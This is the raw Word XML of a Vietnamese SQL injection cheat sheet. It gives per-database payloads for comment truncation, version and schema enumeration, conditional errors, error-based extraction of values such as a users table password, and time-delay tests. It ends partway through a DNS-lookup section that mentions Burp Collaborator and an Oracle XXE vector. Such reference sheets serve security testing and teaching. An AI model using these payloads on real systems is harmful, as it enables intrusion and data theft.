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B" w:rsidRDefault="00216282" w:rsidP="00216282">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>BẢNG HƯỚNG DẪN TIÊM SQL</w:t>
      </w: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NỐI CHUỖI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chuỗi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‘foo’||’bar’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foo’+’bar</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>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‘foo’||’bar’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‘foo’ ‘bar’</w:t>
            </w:r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CONCAT(‘foo’, ‘bar’)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CHUỖI CON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trích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xuất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một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phần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của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chuỗi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00216282">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00216282">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>từ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một</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00216282">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> offset </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00216282">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>được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chỉ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định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với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độ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dài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được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chỉ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định</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00216282">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00216282">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Lưu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00216282">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ý </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00216282">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>rằng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chỉ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số</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00216282">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> offset </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00216282">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dựa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trên</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00216282">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00216282">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mỗi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biểu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thức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sau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sẽ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trả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về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chuỗi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ba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SUBSTR(‘</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>foobar</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>’, 4, 2)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SUBSTRING(‘foobar’,4,2)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SUBSTRING(‘foobar’,4,2)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SUBSTRING(‘foobar’,4,2)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BÌNH LUẬN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sử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dụng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chú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thích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cắt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bớt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truy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vấn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xóa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phần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truy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vấn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gốc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theo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sau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nội</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00216282">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> dung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nhập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--comment</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00216282" w:rsidRDefault="00216282" w:rsidP="00216282">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pP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--comment</w:t>
            </w:r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/*comment*/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--comment</w:t>
            </w:r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/*comment*/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#comment</w:t>
            </w:r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-- comment (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--)</w:t>
            </w:r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/* comment*/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PHIÊN BẢN CSDL (*)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00216282" w:rsidRP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truy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vấn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cơ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sở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dữ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liệu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xác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định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loại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phiên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bản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của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nó</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00216282">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00216282">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Thông</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00216282">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tin </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00216282">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>này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hữu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ích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khi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xây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dựng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các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cuộc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tấn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công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phức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tạp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hơn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banner FROM </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>v$version</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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SELECT version FROM </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>v$instance</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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@@version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version()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@@version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NỘI DUNG CSDL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liệt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kê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các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bảng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trong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cơ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sở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dữ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liệu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các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cột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mà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các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bảng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chứa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all_tables</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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all_tab_columns</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> WHERE </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>table_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> = ‘TABLE-NAME-HERE’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information_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>schema.tables</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/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* FROM information _</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>schema.columns</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> WHERE </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>table_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> = ‘TABLE-NAME-HERE’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information_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>schema.tables</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/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* FROM information _</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>schema.columns</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> WHERE </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>table_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> = ‘TABLE-NAME-HERE’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information_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>schema.tables</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p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* FROM information _</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>schema.columns</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> WHERE </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>table_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> = ‘TABLE-NAME-HERE’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LỖI CÓ ĐIỀU KIỆN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kiểm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một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điều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kiện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boolean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duy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nhất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kích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hoạt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lỗi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cơ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sở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dữ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liệu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nếu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điều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kiện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là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đúng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CASE WHEN (YOUR-CONDITION-HERE) THEN TO_CHAR(1/0) ELSE NULL END FROM dual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>SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END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>1 = (SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/(SELECT 0) ELSE NULL END)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 xml:space="preserve">SELECT IF(YOUR-CONDITION-HERE,(SELECT </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00216282">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>table_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00216282">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> FROM </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00216282">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>information_schema.tables</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00216282">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>),'a')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TRÍCH XUẤT DỮ LIỆU THÔNG QUA CÁC THÔNG BÁO LỖI CÓ THỂ NHÌN THẤY (*)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00216282" w:rsidRDefault="00216282" w:rsidP="00216282">
      <w:pPr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có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thể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nhận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được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thông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báo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lỗi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làm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rò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rỉ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dữ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liệu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nhạy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cảm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được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trả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về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bởi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truy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vấn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độc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hại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của</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00216282">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00216282">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bạn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00216282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SELECT ‘foo’ WHERE 1 = (SELECT ‘secret’)</w:t>
            </w:r>
          </w:p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>&gt; Conversion failed when converting the varchar value 'secret' to data type int.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00216282" w:rsidRDefault="00216282" w:rsidP="00216282">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pP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 xml:space="preserve">SELECT </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00216282">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>CAST(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00216282">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">(SELECT password FROM users LIMIT 1) AS </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00216282">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00216282">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p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>&gt; invalid input syntax for integer: "secret"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00216282" w:rsidTr="00216282"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 xml:space="preserve">SELECT 'foo' WHERE 1=1 AND </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00216282">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>EXTRACTVALUE(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00216282">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>1, CONCAT(0x5c, (SELECT 'secret')))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00216282" w:rsidRDefault="00216282" w:rsidP="00216282">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00216282">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>&gt; XPATH syntax error: '\secret'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00216282" w:rsidRDefault="00216282" w:rsidP="00216282">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00216282" w:rsidRDefault="00216282" w:rsidP="00216282">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>TRUY VẤN THEO ĐỢT (HOẶC XẾP CHỒNG)</w:t>
      </w:r>
      <w:r w:rsidR="00F119FF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (*)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F119FF" w:rsidRDefault="00F119FF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theo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đợt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liên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tiếp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Lưu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ý </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>rằng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trong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các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tiếp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theo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kết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quả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không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về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ứng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. Do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>đó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kỹ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thuật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này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chủ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yếu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liên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quan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đến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các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lỗ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hổng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ẩn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trong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thứ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hai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kích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hoạt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cứu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>lỗi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hoặc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độ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trễ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thời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gian</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF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Does not support batched queries.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F119FF" w:rsidRP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QUERY-1-HERE; QUERY-2-HERE</w:t>
            </w:r>
          </w:p>
          <w:p w:rsid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QUERY-1-HERE QUERY-2-HERE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QUERY-1-HERE; QUERY-2-HERE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F119FF" w:rsidRP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QUERY-1-HERE; QUERY-2-HERE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F119FF" w:rsidRDefault="00F119FF" w:rsidP="00216282">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F119FF" w:rsidRDefault="00F119FF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F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Với</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> MySQL, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>các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theo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đợt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thường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không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tiêm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Tuy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nhiên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điều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này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đôi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nếu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ứng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mục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tiêu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số</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> API PHP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>hoặc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python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giao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tiếp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với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cơ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sở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dữ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liệu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> MySQL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F119FF" w:rsidRDefault="00F119FF" w:rsidP="00216282">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>THỜI GIAN TRỄ (*)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F119FF" w:rsidRDefault="00F119FF" w:rsidP="00216282">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F119FF">
        <w:t xml:space="preserve">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gây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sự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chậm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trễ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thời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gian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trong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cơ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sở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dữ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liệu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xử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lý</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Sau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đây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sẽ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gây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sự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chậm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trễ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thời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gian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vô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là</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>giây</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF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dbms_pipe.receive_message</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>((‘a’),10)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WAITFOR DELAY ‘0:0:10’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pg_sleep</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>(10)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SELECT SLEEP(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F119FF" w:rsidRPr="00F119FF" w:rsidRDefault="00F119FF" w:rsidP="00216282">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F119FF" w:rsidRDefault="00F119FF" w:rsidP="00216282">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>SỰ CHẬM TRỄ THỜI GIAN CÓ ĐIỀU KIỆN (*)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F119FF" w:rsidRDefault="00F119FF" w:rsidP="00216282">
      <w:pPr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kiểm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boolean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nhất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và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kích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hoạt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độ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trễ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thời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gian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nếu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đúng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF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SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F119FF">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>dbms_pipe.receive_message</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F119FF">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>(('a'),10) ELSE NULL END FROM dual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IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'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 xml:space="preserve">SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F119FF">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>pg_sleep</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F119FF">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">(10) ELSE </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F119FF">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>pg_sleep</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F119FF">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>(0) END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F119FF" w:rsidRDefault="00F119FF" w:rsidP="00216282">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F119FF">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>SELECT IF(YOUR-CONDITION-HERE,SLEEP(10),'a')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F119FF" w:rsidRDefault="00F119FF" w:rsidP="00216282">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F119FF" w:rsidRDefault="00F119FF" w:rsidP="00216282">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>TRA CỨU DNS (*)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F119FF" w:rsidRDefault="00F119FF" w:rsidP="00216282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khiến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cơ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sở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dữ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liệu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cứu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>đến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miền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bên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ngoài</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.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việc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này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sẽ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cần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Burp Collaborator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tạo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miền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phụ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Burp Collaborator </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>duy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nhất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mà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sẽ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trong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cuộc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công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của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mình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sau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thăm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dò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máy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chủ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Collaborator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xác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nhận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rằng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xảy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cứu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F119FF" w:rsidRDefault="00F119FF" w:rsidP="00F119FF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>( XXE</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>lỗ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hổng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kích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hoạt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cứu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Lỗ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hổng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vá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nhưng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vẫn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còn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nhiều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cài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đặt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Oracle </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>chưa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vá</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF"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9FF" w:rsidTr="00F119FF"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SELECT EXTRACTVALUE(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F119FF">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>xmltype</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F119FF">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
